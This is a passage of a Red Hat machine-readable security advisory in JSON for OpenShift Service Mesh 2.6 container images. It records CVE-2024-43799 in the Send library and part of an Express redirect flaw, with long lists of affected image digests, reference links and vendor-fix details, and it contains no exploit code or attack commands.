"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
